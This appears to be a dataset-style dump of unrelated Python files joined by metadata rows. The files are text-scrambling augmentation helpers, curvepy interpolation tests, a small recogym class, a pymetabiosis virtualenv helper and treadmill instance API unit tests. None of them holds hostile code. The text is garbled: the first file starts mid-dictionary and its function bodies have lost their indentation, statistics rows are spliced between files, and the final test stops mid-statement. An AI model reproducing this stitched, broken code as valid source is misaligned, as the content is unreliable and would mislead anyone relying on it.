"replace_all_but_nouns_verbs_and_adjectives_first_third_full": replace_all_but_nouns_verbs_and_adjectives_first_third,
"replace_all_but_nouns_verbs_and_adjectives_first_two_thirds_full": replace_all_but_nouns_verbs_and_adjectives_first_two_thirds,
"shuffle_remove_all_but_nouns_first_half_full": shuffle_remove_all_but_nouns_first_half,
"shuffle_remove_all_but_nouns_first_third_full": shuffle_remove_all_but_nouns_first_third,
"shuffle_remove_all_but_nouns_first_two_thirds_full": shuffle_remove_all_but_nouns_first_two_thirds,
"shuffle_remove_all_but_nouns_and_verbs_first_half_full": shuffle_remove_all_but_nouns_and_verbs_first_half,
"shuffle_remove_all_but_nouns_and_verbs_first_third_full": shuffle_remove_all_but_nouns_and_verbs_first_third,
"shuffle_remove_all_but_nouns_and_verbs_first_two_thirds_full": shuffle_remove_all_but_nouns_and_verbs_first_two_thirds,
"shuffle_sentences_remove_all_but_nouns_first_half_full": shuffle_sentences_remove_all_but_nouns_first_half,
"shuffle_sentences_remove_all_but_nouns_first_third_full": shuffle_sentences_remove_all_but_nouns_first_third,
"shuffle_sentences_remove_all_but_nouns_first_two_thirds_full": shuffle_sentences_remove_all_but_nouns_first_two_thirds,
"shuffle_sentences_remove_all_but_nouns_and_verbs_first_half_full": shuffle_sentences_remove_all_but_nouns_and_verbs_first_half,
"shuffle_sentences_remove_all_but_nouns_and_verbs_first_third_full": shuffle_sentences_remove_all_but_nouns_and_verbs_first_third,
"shuffle_sentences_remove_all_but_nouns_and_verbs_first_two_thirds_full": shuffle_sentences_remove_all_but_nouns_and_verbs_first_two_thirds,
"remove_all_but_nouns_and_verbs_fill_first_half_full": remove_all_but_nouns_and_verbs_fill_first_half,
"remove_all_but_nouns_and_verbs_fill_first_third_full": remove_all_but_nouns_and_verbs_fill_first_third,
"remove_all_but_nouns_and_verbs_fill_first_two_thirds_full": remove_all_but_nouns_and_verbs_fill_first_two_thirds,
"remove_all_but_rare_words_first_half_full": remove_all_but_rare_words_first_half,
"remove_all_but_rare_words_first_third_full": remove_all_but_rare_words_first_third,
"remove_all_but_rare_words_first_two_thirds_full": remove_all_but_rare_words_first_two_thirds,
"remove_all_but_common_words_first_half_full": remove_all_but_common_words_first_half,
"remove_all_but_common_words_first_third_full": remove_all_but_common_words_first_third,
"remove_all_but_common_words_first_two_thirds_full": remove_all_but_common_words_first_two_thirds,
"truncate_and_pad_first_half_full": truncate_and_pad_first_half,
"truncate_and_pad_first_third_full": truncate_and_pad_first_third,
"truncate_and_pad_first_two_thirds_full": truncate_and_pad_first_two_thirds,
"pad_first_half_full": pad_first_half,
"pad_first_third_full": pad_first_third,
"pad_first_third_two_thirds_full": pad_first_two_thirds,
"shuffle_within_trigrams_first_half_full": shuffle_within_trigrams_first_half,
"shuffle_within_trigrams_first_third_full": shuffle_within_trigrams_first_third,
"shuffle_within_trigrams_first_two_thirds_full": shuffle_within_trigrams_first_two_thirds,
"shuffle_trigrams_within_sentences_first_half_full": shuffle_trigrams_within_sentences_first_half,
"shuffle_trigrams_within_sentences_first_third_full": shuffle_trigrams_within_sentences_first_third,
"shuffle_trigrams_within_sentences_first_two_thirds_full": shuffle_trigrams_within_sentences_first_two_thirds,
"shuffle_trigrams_globally_first_half_full": shuffle_trigrams_globally_first_half,
"shuffle_trigrams_globally_first_third_full": shuffle_trigrams_globally_first_third,
"shuffle_trigrams_globally_first_two_thirds_full": shuffle_trigrams_globally_first_two_thirds,
"remove_all_but_nouns_verbs_adjectives_and_adverbs_first_half_full": remove_all_but_nouns_verbs_adjectives_and_adverbs_first_half,
"remove_all_but_nouns_verbs_adjectives_and_adverbs_first_third_full": remove_all_but_nouns_verbs_adjectives_and_adverbs_first_third,
"remove_all_but_nouns_verbs_adjectives_and_adverbs_first_two_thirds_full": remove_all_but_nouns_verbs_adjectives_and_adverbs_first_two_thirds,
}
HALF_BACKWARD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING = {x + "_old": HALF_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING[x] for x in HALF_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING}
THIRD_BACKWARD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING = {x + "_old": THIRD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING[x] for x in THIRD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING}
THIRD_BACKWARD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING["identity_first_third_old"] = identity_first_third
THIRD_BACKWARD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING["identity_first_two_thirds_old"] = identity_first_two_thirds
QUARTER_BACKWARD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING = {x[:-8] + "_old_quarter": QUARTER_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING[x] for x in QUARTER_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING}
SIXTH_BACKWARD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING = {x[:-6] + "_old_sixth": SIXTH_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING[x] for x in SIXTH_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING}
SIXTH_BACKWARD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING["identity_first_third_old_sixth"] = identity_first_third
SIXTH_BACKWARD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING["identity_first_two_thirds_old_sixth"] = identity_first_two_thirds
FULL_BACKWARD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING = {x[:-5] + "_old_full": FULL_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING[x] for x in FULL_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING}
FULL_BACKWARD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING["identity_first_third_old_full"] = identity_first_third
FULL_BACKWARD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING["identity_first_two_thirds_old_full"] = identity_first_two_thirds
PADDED_FUNCTIONS = (
remove_all_but_pos,
remove_all_but_named_entities,
remove_all_but_function_words,
remove_all_but_rare_words,
remove_all_but_common_words,
truncate_and_pad,
pad,
)
REPLACE_FUNCTIONS = (
replace_all_but_pos,
)
FILL_FUNCTIONS = (
remove_all_but_pos_fill,
)
# ---------- HELPERS ----------
def create_lowpmi(sentence_list, tokenizer): #adapted from Mollica 2019
"""
Create a maximally scrambled condition via splitting each sentence into even- and odd indexed context- and function word
lists and concatenating them. Different to Mollica (who used a not entirely consistent way of assigning words to
function word/content word classes), we're using POS tags for better consistency.
"""
content_regex = re.compile('JJ.*|NN.*|RB.*|VB.*')
#JJ = adjectives
#NN = nouns
#RB = adverbs
#VB = verbs
out = []
for sent in sentence_list:
if not sent:
continue
# sent = sent.lower()
# print(sent)
# words = re.split(r' +', sent) #don't use NLTK word tokenizer, or else build work-around for 's sentences
words = convert_to_tokens(sent, tokenizer, add_space=True)
# words = [re.sub(r"[^\w\d'\s]+",'',elm) for elm in words] #strip punctuation except for apostrophes
# print(words)
pos_tagged = nltk.pos_tag(list(filter(lambda x: x, words)))
content = [x[0] for x in pos_tagged if re.match(content_regex,x[1])]
function = [x[0] for x in pos_tagged if not re.match(content_regex,x[1])]
# print("content: ", content)
# print("function: ", function)
content1 = []
content2 = []
for i, c in enumerate(content): #create two lists of content words (even and odd indexed content words in the sentence)
if i % 2 == 0:
content1.append(c)
else:
content2.append(c)
function1 = []
function2 = []
for i, c in enumerate(function): #create two lists of function words (even and odd indexed function words in the sentence)
if i % 2 == 0:
function1.append(c)
else:
function2.append(c)
# for i in range(len(words)-1):
# if words[i] == '':
# if words[i+1] in content1:
# content1[content1.index(words[i+1])] = " " + words[i+1]
# elif words[i+1] in content2:
# content2[content2.index(words[i+1])] = " " + words[i+1]
# elif words[i+1] in function1:
# function1[function1.index(words[i+1])] = " " + words[i+1]
# elif words[i+1] in function2:
# function2[function2.index(words[i+1])] = " " + words[i+1]
# if content1[0] == words[0] and content1[0][0].isspace() and len(tokenizer.tokenize(words[0])) == len(tokenizer.tokenize(" " + [0])):
# content1[0] = content1[0][1:]
out.append(''.join(content1 + function1 + function2 + content2))
return out
def kendall_distance(x,y): #from Mollica 2019
"""
Use kendalltau to compute kendall distance
http://en.wikipedia.org/wiki/Kendall_tau_distance
"""
assert len(x) == len(y)
n = len(x)
tau, pv = kendalltau(x,y)
# print("tau: ", tau)
# print("x :", x)
# print("y :", y)
# concordant_minus_discordant
concordant_minus_discordant = tau * (0.5)*n*(n-1)
# c + d = n(n-1)/2
# so c+d-(c-d) = 2d = n(n-1)/2 - concordant_minus_discordant
d = (n*(n-1)/2 - concordant_minus_discordant)/2
return round(d) # round to fix numerical precision errors
def make_permutation_with_distance(d, n): #from Mollica 2019
"""
Make a permutation on n elements whose distance to 0,1,2,...,n
is AT LEAST d
Note: we sometimes may be more than d, as we return the first time
a swap gets us above or equal to d. Sometimes, you can't get a given number...
"""
# assert n >= 2
# assert d <= n*(n-1)/2
nar = list(range(n))
xar = list(range(n))
## TODO: We could make this faster by running at least d swaps first
while kendall_distance(nar, xar) < d:
# Print(kendall_distance(nar, xar))
# swap two elements
i = randint(0,n-2)
xar[i], xar[i+1] = xar[i+1], xar[i]
return xar
def create_highpmi(sentence_list, tokenizer, count): #adapted from Mollica 2019
"""
Create permutation conditions (0 to 7 local swaps with constant PMI) for each sentence and populate dataframe
"""
levels = []
scrambled_sentences = []
added_space = False
for sent in sentence_list:
# words = re.split(r'\s+', l)
# words = [re.sub(r"[^\w\d'\s]+",'',elm) for elm in words]
# words = [elm.lower() for elm in words]
if not sent:
continue
words = convert_to_tokens(sent, tokenizer, add_space=True)
words = list(filter(lambda x: x, words))
n = len(words)
if n == 0:
continue
if n == 1:
scrambled_sentences.append(sent)
continue
perm = make_permutation_with_distance(0, len(words))
# if n == 2:
# scrambled_sentences.append(''.join([words[1], words[0] ]))
# continue
for level in range(7, -1, -1): #level = number of local swaps (0 to 7)
if level > n*(n-1)/2:
continue
perm = make_permutation_with_distance(level, n)
if kendall_distance(perm, range(len(words))) != level: # Make sure we're not an unreachable perm
continue
if not added_space and count < 2 and not words[0][0].isspace() and not perm[0] == 0:
words[0] = " " + words[0]
words[perm[0]] = tokenizer.convert_tokens_to_string(tokenizer.tokenize(words[perm[0]])[1:])
added_space = True
out = ''.join([ words[i] for i in perm])
scrambled_sentences.append(out)
break
return scrambled_sentences
def get_lists(df):
"""
Get condition lists from dataframe
"""
Original = list(df[df['level'] == 0]['scrambled_sentence'])
Scr1 = list(df[df['level'] == 1]['scrambled_sentence'])
Scr3 = list(df[df['level'] == 3]['scrambled_sentence'])
Scr5 = list(df[df['level'] == 5]['scrambled_sentence'])
Scr7 = list(df[df['level'] == 7]['scrambled_sentence'])
return Original, Scr1, Scr3, Scr5, Scr7
def main_stablepmi(sentence_list):
df = create_df_permute_sentences(sentence_list)
return get_lists(df)
def get_trigrams(sentence):
trigrams = []
trigram = []
for i in range(len(sentence)):
trigram.append(sentence[i])
if i % 3 == 2:
trigrams.append(trigram[:])
trigram = []
if trigram:
trigrams.append(trigram)
return trigrams
def trigram_shuffle(sentence):
trigrams = get_trigrams(sentence)
for trigram in trigrams:
random.shuffle(trigram)
return "".join(["".join(trigram) for trigram in trigrams])
def shuffle_trigrams(sentence):
trigrams = get_trigrams(sentence)
random.shuffle(trigrams)
return "".join(["".join(trigram) for trigram in trigrams])
| 64.447368 | 206 | 0.807464 | 8,553 | 61,225 | 5.177832 | 0.034725 | 0.052703 | 0.090503 | 0.072551 | 0.903491 | 0.881159 | 0.862214 | 0.83882 | 0.81423 | 0.770537 | 0 | 0.004918 | 0.113271 | 61,225 | 949 | 207 | 64.515279 | 0.810812 | 0.058734 | 0 | 0.208745 | 0 | 0 | 0.209103 | 0.194448 | 0 | 0 | 0 | 0.001054 | 0.00141 | 1 | 0.139633 | false | 0 | 0.014104 | 0.102962 | 0.296192 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 7 |
293e6aa6f26baea48ed3b85f93c2de226fb2ef49 | 93 | py | Python | src/ctc/spec/exceptions/__init__.py | fei-protocol/checkthechain | ec838f3d0d44af228f45394d9ba8d8eb7f677520 | [
"MIT"
] | 94 | 2022-02-15T19:34:49.000Z | 2022-03-26T19:26:22.000Z | src/ctc/spec/exceptions/__init__.py | fei-protocol/checkthechain | ec838f3d0d44af228f45394d9ba8d8eb7f677520 | [
"MIT"
] | 7 | 2022-03-03T02:58:47.000Z | 2022-03-11T18:41:05.000Z | src/ctc/spec/exceptions/__init__.py | fei-protocol/checkthechain | ec838f3d0d44af228f45394d9ba8d8eb7f677520 | [
"MIT"
] | 7 | 2022-02-15T17:53:07.000Z | 2022-03-17T19:14:17.000Z | from .abi_exceptions import *
from .oracle_exceptions import *
from .rpc_exceptions import *
| 23.25 | 32 | 0.806452 | 12 | 93 | 6 | 0.5 | 0.666667 | 0.555556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 93 | 3 | 33 | 31 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
294dfc41d882a8e1097497074561646d02572b04 | 2,951 | py | Python | test/accumulator_map_test.py | diatche/curvepy | 1876ad922238a8794dfeb1b1773c179081eae0dd | [
"MIT"
] | null | null | null | test/accumulator_map_test.py | diatche/curvepy | 1876ad922238a8794dfeb1b1773c179081eae0dd | [
"MIT"
] | null | null | null | test/accumulator_map_test.py | diatche/curvepy | 1876ad922238a8794dfeb1b1773c179081eae0dd | [
"MIT"
] | null | null | null | import pytest
import numpy as np
from curvepy import Points
from . import test_util
def test_trailing_min_linear_interpolation_degree():
f = Points(test_util.point_gen([1, 2, 3])).trailing_min(2, interpolation=0)
assert np.allclose(f.sample_points(), [(0, 1), (1, 1), (2, 2)])
assert f(0.5) == 1
assert f(1) == 1
assert f(1.5) == 1.5
assert f(2) == 2
def test_trailing_max_linear_interpolation_degree():
f = Points(test_util.point_gen([1, 2, 3, 2])).trailing_max(2, interpolation=0)
assert np.allclose(f.sample_points(), [(0, 1), (1, 2), (2, 3), (3, 3)])
assert f(0.5) == 1.5
assert f(1) == 2
assert f(2) == 3
assert f(3) == 3
def test_trailing_min_previous_interpolation_degree():
f = Points(test_util.point_gen([1, 2, 3])).trailing_min(2, interpolation=-1)
assert np.allclose(f.sample_points(), [(0, 1), (1, 1), (2, 2)])
assert f(0.5) == 1
assert f(1) == 1
assert f(1.5) == 1
assert f(2) == 2
def test_trailing_max_previous_interpolation_degree_2():
f = Points(test_util.point_gen([1, 2, 3, 2])).trailing_max(2, interpolation=-1)
assert np.allclose(f.sample_points(), [(0, 1), (1, 2), (2, 3), (3, 3)])
assert f(0.5) == 1
assert f(1) == 2
assert f(1.5) == 2
assert f(2) == 3
assert f(3) == 3
def test_trailing_max_previous_interpolation_degree_3():
f = Points(test_util.point_gen([1, 2, 3, 2, 1, 1.5])).trailing_max(3, interpolation=-1)
assert np.allclose(f.sample_points(), [(0, 1), (1, 2), (2, 3), (3, 3), (4, 3), (5, 2)])
assert f(0.5) == 1
assert f(1) == 2
assert f(2) == 3
assert f(3) == 3
assert f(4) == 3
assert f(4.5) == 3
assert f(5) == 2
def test_trailing_min_linear_interpolation_period():
f = Points(test_util.point_gen([1, 2, 3])).trailing_min(1, is_period=True, interpolation=0)
assert np.allclose(f.sample_points(), [(0, 1), (1, 1), (2, 2)])
assert f(0.5) == 1
assert f(1) == 1
assert f(1.5) == 1.5
assert f(2) == 2
def test_trailing_max_linear_interpolation_period():
f = Points(test_util.point_gen([1, 2, 3, 2])).trailing_max(1, is_period=True, interpolation=0)
assert np.allclose(f.sample_points(), [(0, 1), (1, 2), (2, 3), (3, 3)])
assert f(0.5) == 1.5
assert f(1) == 2
assert f(2) == 3
assert f(3) == 3
def test_trailing_min_previous_interpolation_period():
f = Points(test_util.point_gen([1, 2, 3])).trailing_min(1, is_period=True, interpolation=-1)
assert np.allclose(f.sample_points(), [(0, 1), (1, 1), (2, 2)])
assert f(0.5) == 1
assert f(1) == 1
assert f(1.5) == 1
assert f(2) == 2
def test_trailing_max_previous_interpolation_period():
f = Points(test_util.point_gen([1, 2, 3, 2])).trailing_max(1, is_period=True, interpolation=-1)
assert np.allclose(f.sample_points(), [(0, 1), (1, 2), (2, 3), (3, 3)])
assert f(0.5) == 1
assert f(1) == 2
assert f(2) == 3
assert f(3) == 3
| 32.788889 | 99 | 0.605557 | 526 | 2,951 | 3.230038 | 0.062738 | 0.164803 | 0.065921 | 0.05827 | 0.930547 | 0.930547 | 0.909358 | 0.88817 | 0.88817 | 0.887581 | 0 | 0.094148 | 0.200949 | 2,951 | 89 | 100 | 33.157303 | 0.626378 | 0 | 0 | 0.619718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.690141 | 1 | 0.126761 | false | 0 | 0.056338 | 0 | 0.183099 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
29666f23170a488fed9fa7e550ee11f1c90c34a6 | 264 | py | Python | recogym/envs/observation.py | philomenec/reco-gym | f8553d197f42ec2f415aefce48525d0e9b10ddaa | [
"Apache-2.0"
] | 413 | 2018-09-18T17:49:44.000Z | 2022-03-23T12:25:41.000Z | recogym/envs/observation.py | aliang-rec/reco-gym | f8553d197f42ec2f415aefce48525d0e9b10ddaa | [
"Apache-2.0"
] | 15 | 2018-11-08T17:04:21.000Z | 2021-11-30T19:20:27.000Z | recogym/envs/observation.py | aliang-rec/reco-gym | f8553d197f42ec2f415aefce48525d0e9b10ddaa | [
"Apache-2.0"
] | 81 | 2018-09-22T02:28:55.000Z | 2022-03-30T14:03:01.000Z | class Observation:
def __init__(self, context, sessions):
self.current_context = context
self.current_sessions = sessions
def context(self):
return self.current_context
def sessions(self):
return self.current_sessions
| 24 | 42 | 0.681818 | 29 | 264 | 5.931034 | 0.310345 | 0.255814 | 0.209302 | 0.244186 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 264 | 10 | 43 | 26.4 | 0.868687 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.375 | false | 0 | 0 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
4657afa4751e386f6c785ae5a8cfa1015f855715 | 159 | py | Python | pymetabiosis/utils.py | prabhuramachandran/pymetabiosis | 2355e5e2b5daabc96b0c5126b14387efeaa0c5d2 | [
"MIT"
] | null | null | null | pymetabiosis/utils.py | prabhuramachandran/pymetabiosis | 2355e5e2b5daabc96b0c5126b14387efeaa0c5d2 | [
"MIT"
] | null | null | null | pymetabiosis/utils.py | prabhuramachandran/pymetabiosis | 2355e5e2b5daabc96b0c5126b14387efeaa0c5d2 | [
"MIT"
] | null | null | null | from pymetabiosis import import_module
builtin = import_module("__builtin__")
def activate_virtualenv(path):
builtin.execfile(path, {"__file__" : path})
| 22.714286 | 47 | 0.773585 | 18 | 159 | 6.222222 | 0.611111 | 0.214286 | 0.339286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119497 | 159 | 6 | 48 | 26.5 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0.119497 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4679d9d74e5d605540851da40a7cd1fbd504990d | 17,138 | py | Python | lib/python/treadmill/tests/api/instance_test.py | vrautela/treadmill | 05e47fa8acdf8bad7af78e737efb26ea6488de82 | [
"Apache-2.0"
] | null | null | null | lib/python/treadmill/tests/api/instance_test.py | vrautela/treadmill | 05e47fa8acdf8bad7af78e737efb26ea6488de82 | [
"Apache-2.0"
] | 1 | 2017-09-18T10:36:12.000Z | 2017-09-18T10:36:12.000Z | lib/python/treadmill/tests/api/instance_test.py | evreng/treadmill | 05e47fa8acdf8bad7af78e737efb26ea6488de82 | [
"Apache-2.0"
] | null | null | null | """Instance API tests.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import mock
import jsonschema
import six
from treadmill import admin
from treadmill import exc
from treadmill import yamlwrapper as yaml
from treadmill.api import instance
from treadmill.scheduler import masterapi
def _create_apps(_zkclient, _app_id, app, _count, _created_by):
return app
class ApiInstanceTest(unittest.TestCase):
"""treadmill.api.instance tests."""
def setUp(self):
self.instance = instance.API()
@mock.patch('treadmill.context.AdminContext.conn',
mock.Mock(return_value=admin.Admin(None, None)))
@mock.patch('treadmill.context.ZkContext.conn', mock.Mock())
@mock.patch('treadmill.scheduler.masterapi.create_apps', mock.Mock())
@mock.patch('treadmill.api.instance._check_required_attributes',
mock.Mock())
@mock.patch('treadmill.scheduler.masterapi.get_scheduled_stats',
mock.Mock(return_value={}))
def test_normalize_run_once(self):
"""Test missing defaults which cause the app to fail."""
doc = """
services:
- command: /bin/sleep 1m
name: sleep1m
restart:
limit: 0
memory: 150M
cpu: 10%
disk: 100M
"""
masterapi.create_apps.side_effect = _create_apps
new_doc = self.instance.create('proid.app', yaml.load(doc))
# Disable E1126: Sequence index is not an int, slice, or instance
# pylint: disable=E1126
self.assertEqual(new_doc['services'][0]['restart']['interval'], 60)
self.assertTrue(masterapi.create_apps.called)
@mock.patch('treadmill.context.AdminContext.conn',
mock.Mock(return_value=admin.Admin(None, None)))
@mock.patch('treadmill.context.ZkContext.conn', mock.Mock())
@mock.patch('treadmill.scheduler.masterapi.create_apps', mock.Mock())
@mock.patch('treadmill.scheduler.masterapi.get_scheduled_stats',
mock.Mock(return_value={}))
def test_run_once_small_memory(self):
"""Testing too small memory definition for container."""
doc = """
services:
- command: /bin/sleep 10
name: sleep1m
restart:
limit: 0
memory: 10M
cpu: 10%
disk: 100M
"""
masterapi.create_apps.side_effect = _create_apps
with self.assertRaises(exc.TreadmillError):
self.instance.create('proid.app', yaml.load(doc))
@mock.patch('treadmill.context.AdminContext.conn',
mock.Mock(return_value=admin.Admin(None, None)))
@mock.patch('treadmill.context.ZkContext.conn', mock.Mock())
@mock.patch('treadmill.admin.Application.get',
mock.Mock(return_value={
'_id': 'proid.app',
'tickets': ['foo@bar.baz'],
'cpu': '10%',
'memory': '100M',
'disk': '100M',
'endpoints': [{'name': 'http', 'port': 8888}],
'services': [{
'command': 'python -m SimpleHTTPServer 8888',
'name': 'web_server',
'restart': {'interval': 60, 'limit': 3}
}],
'features': [],
'ephemeral_ports': {},
'passthrough': [],
'args': [],
'environ': [],
'affinity_limits': {}
}))
@mock.patch('treadmill.scheduler.masterapi.create_apps')
@mock.patch('treadmill.api.instance._check_required_attributes',
mock.Mock())
@mock.patch('treadmill.api.instance._set_defaults',
mock.Mock())
@mock.patch('treadmill.scheduler.masterapi.get_scheduled_stats',
mock.Mock(return_value={}))
def test_instance_create_configured(self, create_apps_mock):
"""Test creating configured instance."""
create_apps_mock.side_effect = _create_apps
app = {
'tickets': ['foo@bar.baz'],
'cpu': '10%',
'memory': '100M',
'disk': '100M',
'endpoints': [{'name': 'http', 'port': 8888}],
'services': [{
'command': 'python -m SimpleHTTPServer 8888',
'name': 'web_server',
'restart': {'interval': 60, 'limit': 3}
}],
'features': [],
'ephemeral_ports': {},
'passthrough': [],
'args': [],
'environ': [],
'affinity_limits': {},
}
self.instance.create('proid.app', {})
create_apps_mock.assert_called_once_with(
mock.ANY, 'proid.app', app, 1, None
)
create_apps_mock.reset_mock()
self.instance.create('proid.app', {}, created_by='monitor')
create_apps_mock.assert_called_once_with(
mock.ANY, 'proid.app', app, 1, 'monitor'
)
create_apps_mock.reset_mock()
self.instance.create('proid.app', {}, 2, 'foo@BAR.BAZ')
create_apps_mock.assert_called_once_with(
mock.ANY, 'proid.app', app, 2, 'foo@BAR.BAZ'
)
with six.assertRaisesRegex(self,
jsonschema.exceptions.ValidationError,
'u?\'invalid!\' is not valid'):
self.instance.create('proid.app', {}, created_by='invalid!')
with six.assertRaisesRegex(self,
jsonschema.exceptions.ValidationError,
'0 is less than the minimum of 1'):
self.instance.create('proid.app', {}, count=0)
with six.assertRaisesRegex(self,
jsonschema.exceptions.ValidationError,
'1001 is greater than the maximum of 1000'):
self.instance.create('proid.app', {}, count=1001)
@mock.patch('treadmill.context.AdminContext.conn',
mock.Mock(return_value=admin.Admin(None, None)))
@mock.patch('treadmill.context.ZkContext.conn', mock.Mock())
@mock.patch('treadmill.scheduler.masterapi.delete_apps')
def test_instance_delete(self, delete_apps_mock):
"""Test deleting an instance."""
delete_apps_mock.return_value = None
self.instance.delete('proid.app#0000000001')
delete_apps_mock.assert_called_once_with(
mock.ANY, ['proid.app#0000000001'], None
)
delete_apps_mock.reset_mock()
self.instance.delete('proid.app#0000000002', deleted_by='monitor')
delete_apps_mock.assert_called_once_with(
mock.ANY, ['proid.app#0000000002'], 'monitor'
)
delete_apps_mock.reset_mock()
self.instance.delete('proid.app#0000000003', deleted_by='foo@BAR.BAZ')
delete_apps_mock.assert_called_once_with(
mock.ANY, ['proid.app#0000000003'], 'foo@BAR.BAZ'
)
with six.assertRaisesRegex(self,
jsonschema.exceptions.ValidationError,
'u?\'invalid!\' is not valid'):
self.instance.delete('proid.app#0000000001', deleted_by='invalid!')
@mock.patch('treadmill.context.AdminContext.conn',
mock.Mock(return_value=admin.Admin(None, None)))
@mock.patch('treadmill.context.ZkContext.conn', mock.Mock())
@mock.patch('treadmill.admin.Application.get',
mock.Mock(return_value={
'_id': 'proid.app',
'cpu': '10%',
'memory': '100M',
'disk': '100M',
'image': 'docker://foo',
}))
@mock.patch('treadmill.scheduler.masterapi.create_apps')
@mock.patch('treadmill.api.instance._check_required_attributes',
mock.Mock())
@mock.patch('treadmill.api.instance._set_defaults', mock.Mock())
@mock.patch('treadmill.scheduler.masterapi.get_scheduled_stats',
mock.Mock(return_value={}))
def test_inst_create_cfg_docker(self, create_apps_mock):
"""Test creating configured docker instance.
"""
create_apps_mock.side_effect = _create_apps
app = {
'cpu': '10%',
'memory': '100M',
'disk': '100M',
'image': 'docker://foo',
}
self.instance.create('proid.app', {})
create_apps_mock.assert_called_once_with(
mock.ANY, 'proid.app', app, 1, None
)
create_apps_mock.reset_mock()
self.instance.create('proid.app', {}, created_by='monitor')
create_apps_mock.assert_called_once_with(
mock.ANY, 'proid.app', app, 1, 'monitor'
)
create_apps_mock.reset_mock()
with six.assertRaisesRegex(self,
jsonschema.exceptions.ValidationError,
'u?\'invalid!\' is not valid'):
self.instance.create('proid.app', {}, created_by='invalid!')
with six.assertRaisesRegex(self,
jsonschema.exceptions.ValidationError,
'0 is less than the minimum of 1'):
self.instance.create('proid.app', {}, count=0)
with six.assertRaisesRegex(self,
jsonschema.exceptions.ValidationError,
'1001 is greater than the maximum of 1000'):
self.instance.create('proid.app', {}, count=1001)
@mock.patch('treadmill.context.AdminContext.conn',
mock.Mock(return_value=admin.Admin(None, None)))
@mock.patch('treadmill.context.ZkContext.conn', mock.Mock())
@mock.patch('treadmill.scheduler.masterapi.create_apps')
@mock.patch('treadmill.api.instance._check_required_attributes',
mock.Mock())
@mock.patch('treadmill.api.instance._set_defaults',
mock.Mock())
@mock.patch('treadmill.scheduler.masterapi.get_scheduled_stats',
mock.Mock(return_value={}))
def test_inst_create_eph_docker(self, create_apps_mock):
"""Test creating ephemeral docker instance.
"""
create_apps_mock.side_effect = _create_apps
ephemeral_app = {
'cpu': '10%',
'memory': '100M',
'disk': '100M',
'image': 'docker://foo',
}
resulting_app = {
'cpu': '10%',
'memory': '100M',
'disk': '100M',
'image': 'docker://foo',
'tickets': [],
'endpoints': [],
'features': [],
'ephemeral_ports': {},
'passthrough': [],
'args': [],
'environ': [],
'affinity_limits': {},
}
self.instance.create('proid.app', ephemeral_app)
create_apps_mock.assert_called_once_with(
mock.ANY, 'proid.app', resulting_app, 1, None
)
with six.assertRaisesRegex(self,
jsonschema.exceptions.ValidationError,
'u?\'invalid!\' is not valid'):
self.instance.create('proid.app', {}, created_by='invalid!')
with six.assertRaisesRegex(self,
jsonschema.exceptions.ValidationError,
'0 is less than the minimum of 1'):
